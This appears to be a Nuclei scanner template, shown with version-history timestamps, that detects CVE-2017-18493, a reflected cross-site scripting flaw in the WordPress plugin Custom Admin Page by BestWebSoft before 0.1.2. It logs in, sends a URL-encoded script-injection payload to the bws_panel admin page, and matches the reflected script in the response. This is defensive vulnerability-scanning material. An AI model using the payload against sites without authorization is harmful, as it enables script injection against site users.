2023-10-05 18:36:49 +00:00
|
|
|
id: CVE-2017-18493
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting
|
|
|
|
author: luisfelipe146
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
The custom-admin-page plugin before 0.1.2 for WordPress has multiple XSS issues.
|
|
|
|
reference:
|
|
|
|
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-18493
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18493
|
|
|
|
- https://wordpress.org/plugins/custom-admin-page/#developers
|
|
|
|
classification:
|
|
|
|
cve-id: CVE-2017-18493
|
|
|
|
metadata:
|
2023-10-23 09:43:49 +00:00
|
|
|
max-request: 3
|
2023-10-05 18:36:49 +00:00
|
|
|
verified: true
|
2023-10-23 09:43:49 +00:00
|
|
|
publicwww-query: "/wp-content/plugins/custom-admin-page/"
|
|
|
|
tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated
|
2023-10-05 18:36:49 +00:00
|
|
|
|
2023-10-22 12:35:42 +00:00
|
|
|
http:
|
2023-10-05 18:36:49 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /wp-login.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
|
|
|
|
- |
|
2023-10-22 12:35:42 +00:00
|
|
|
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
- |
|
|
|
|
GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1
|
2023-10-05 18:36:49 +00:00
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers:
|
2023-10-22 12:35:42 +00:00
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'status_code_2 == 200'
|
|
|
|
- 'contains(header_2, "text/html")'
|
|
|
|
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
|
|
|
|
- 'contains(body_3, "Custom Admin Page by")'
|
2023-10-25 07:33:43 +00:00
|
|
|
condition: and
|
|
|
|
# digest: 4b0a00483046022100a5bf4c8ded2464a0b144ae1acdcddede4339f2a7b0d9ad53695fb3c068728a60022100ea33e422fc96b2695b93bd46522d8ae78f8c6b150072685aabc344dd0a4996c1:922c64590222798bb761d5b6d8e72950
|